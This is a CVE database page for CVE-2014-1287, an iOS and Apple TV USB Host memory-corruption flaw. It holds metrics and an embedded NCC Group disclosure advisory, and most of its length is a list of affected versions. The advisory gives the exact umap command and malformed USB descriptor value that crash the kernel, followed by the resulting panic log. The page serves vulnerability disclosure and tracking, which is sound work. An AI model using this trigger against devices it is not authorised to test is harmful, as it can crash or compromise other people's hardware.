Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
USB Host in Apple iOS before 7.1 and Apple TV before 6.1 allows physically proximate attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted USB messages.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32333
Publication date : 2014-03-16 23h00 +00:00
Author : Andy Davis
EDB Verified : No
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title iOS 7 arbitrary code execution in kernel mode
Release Date 14 March 2014
Reference NGS00596
Discoverer Andy Davis
Vendor Apple
Vendor Reference 600217059
Systems Affected iPhone 4 and later, iPod touch (5th generation) and later,
iPad 2 and later
CVE Reference CVE-2014-1287
Risk High
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 26 September 2013
Reported 26 September 2013
Released 26 September 2013
Fixed 10 March 2014
Published 14 March 2014
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
When a specific value is supplied in USB Endpoint descriptor for a HID device
the Apple device kernel panics and reboots
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The bug can be triggered using umap (https://github.com/nccgroup/umap)
as follows:
sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46
bMaxPacketSize = 0xff
Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
CrashReporter Key: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b
Hardware Model: iPhone3,1
Date/Time: 2013-09-26 12:35:46.892 +0100
OS Version: iOS 7.0 (11A465)
panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,
fault_addr=0x28
r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe
r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78
r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001
r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8
cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028
Debugger message: panic
OS version: 11A465
Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;
root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1940.1.75
secure boot?: YES
Paniclog version: 1
Kernel slide: 0x0000000008200000
Kernel text base: 0x88201000
Epoch Time: sec usec
Boot : 0x52441b69 0x00000000
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x52441bb5 0x00056497
Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
A patch can be downloaded from the following location:
http://support.apple.com/kb/HT1222
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
Products Mentioned
Configuraton 0
Apple>>Tvos >> Version To (including) 6.0.2
- Apple>>Tvos >> Version - (Open CPE detail)
- Apple>>Tvos >> Version 1.0.0 (Open CPE detail)
- Apple>>Tvos >> Version 1.1.0 (Open CPE detail)
- Apple>>Tvos >> Version 2.0.0 (Open CPE detail)
- Apple>>Tvos >> Version 2.0.1 (Open CPE detail)
- Apple>>Tvos >> Version 2.0.2 (Open CPE detail)
- Apple>>Tvos >> Version 2.1.0 (Open CPE detail)
- Apple>>Tvos >> Version 2.2.0 (Open CPE detail)
- Apple>>Tvos >> Version 2.3.0 (Open CPE detail)
- Apple>>Tvos >> Version 2.3.1 (Open CPE detail)
- Apple>>Tvos >> Version 2.4.0 (Open CPE detail)
- Apple>>Tvos >> Version 3.0.0 (Open CPE detail)
- Apple>>Tvos >> Version 3.0.1 (Open CPE detail)
- Apple>>Tvos >> Version 3.0.2 (Open CPE detail)
- Apple>>Tvos >> Version 4.1.0 (Open CPE detail)
- Apple>>Tvos >> Version 4.1.1 (Open CPE detail)
- Apple>>Tvos >> Version 4.2.0 (Open CPE detail)
- Apple>>Tvos >> Version 4.2.1 (Open CPE detail)
- Apple>>Tvos >> Version 4.2.2 (Open CPE detail)
- Apple>>Tvos >> Version 4.3.0 (Open CPE detail)
- Apple>>Tvos >> Version 4.4.0 (Open CPE detail)
- Apple>>Tvos >> Version 4.4.2 (Open CPE detail)
- Apple>>Tvos >> Version 4.4.3 (Open CPE detail)
- Apple>>Tvos >> Version 4.4.4 (Open CPE detail)
- Apple>>Tvos >> Version 5.0.0 (Open CPE detail)
- Apple>>Tvos >> Version 5.0.1 (Open CPE detail)
- Apple>>Tvos >> Version 5.0.2 (Open CPE detail)
- Apple>>Tvos >> Version 5.1.0 (Open CPE detail)
- Apple>>Tvos >> Version 5.1.1 (Open CPE detail)
- Apple>>Tvos >> Version 5.2.0 (Open CPE detail)
- Apple>>Tvos >> Version 6.0 (Open CPE detail)
- Apple>>Tvos >> Version 6.0.1 (Open CPE detail)
- Apple>>Tvos >> Version 6.0.2 (Open CPE detail)
Apple>>Tvos >> Version 6.0
- Apple>>Tvos >> Version 6.0 (Open CPE detail)
Apple>>Tvos >> Version 6.0.1
- Apple>>Tvos >> Version 6.0.1 (Open CPE detail)
Configuraton 0
Apple>>Iphone_os >> Version To (including) 7.0.6
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version - (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 3.2.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.6 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.7 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.8 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.9 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.2.10 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 4.3.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 5.1.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 6.1.6 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.1 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.2 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.3 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.4 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.5 (Open CPE detail)
- Apple>>Iphone_os >> Version 7.0.6 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0
- Apple>>Iphone_os >> Version 7.0 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0.1
- Apple>>Iphone_os >> Version 7.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0.2
- Apple>>Iphone_os >> Version 7.0.2 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0.3
- Apple>>Iphone_os >> Version 7.0.3 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0.4
- Apple>>Iphone_os >> Version 7.0.4 (Open CPE detail)
Apple>>Iphone_os >> Version 7.0.5
- Apple>>Iphone_os >> Version 7.0.5 (Open CPE detail)
References
2025©
tesweb SA
